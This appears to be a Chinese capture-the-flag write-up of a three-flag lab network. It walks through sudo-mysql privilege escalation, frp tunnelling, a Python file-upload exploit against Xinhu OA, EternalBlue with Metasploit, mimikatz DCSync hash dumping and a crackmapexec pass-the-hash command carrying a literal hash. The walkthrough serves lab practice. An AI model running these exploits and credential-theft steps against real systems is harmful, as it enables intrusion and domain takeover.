目录
flag1
flag2
flag3
flag1
外网thinkphp服务
随便找个工具梭
连蚁剑
读/root目录要提权
suid没有可利用的提权命令,打sudo提权
sudo -l
mysql的sudo提权
Linux提权之Sudo 70种提权方法 - 简单安全
查看文件名带flag的文件
sudo mysql -e '\! find / -type f -name '*flag*' 2>/dev/null'
读文件
sudo mysql -e '\! cat /root/flag/flag01.txt'拿到第一个flag,提示下一个flag在内网服务器
flag{60b53231-
flag2
msf反弹shell
上传fscan扫内网
https://github.com/shadow1ng/fscan/releases
172.22.1.2 DC域控 172.22.1.21 MS17-010永恒之蓝 172.22.1.18 信呼OA系统
先打信呼0A
frp内网穿透
vps上先起一个frps
./frps -c frps.ini
再在靶机上起一个frpc
先上传或者wget下载frpc和frpc.ini
./frpc -c frpc.ini
本机电脑配一下Proxifier
然后就能直接浏览器里访问内网服务
现成exp梭了
import requestssession = requests.session()url_pre = 'http://url/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'data1 = {'rempass': '0','jmpass': 'false','device': '1625884034525','ltype': '0','adminuser': 'dGVzdA::','adminpass': 'YWJjMTIz','yanzm': ''
}r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'r = session.get(url3)
先给蚁剑配置socks5代理
蚁剑连http://172.22.1.18/upload/2024-08/20_17073585.php拿到flag2
flag02: 2ce3-4813-87d4-
最后提示我们去打DC
flag3
在打DC前先打172.22.1.21 MS17-010永恒之蓝
这个一般直接拿kali的msf打就行
先给msf所在机配一下socks5代理
vim /etc/proxychains4.conf
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit成功正向连接
永恒之蓝打了之后本身就是SYSTEM权限,可以mimikatz搜集域内用户hash
load kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv 
再用crackmapexec打PTH拿下域控
proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
拿到flag3
flag03: e8f88d0d43d6}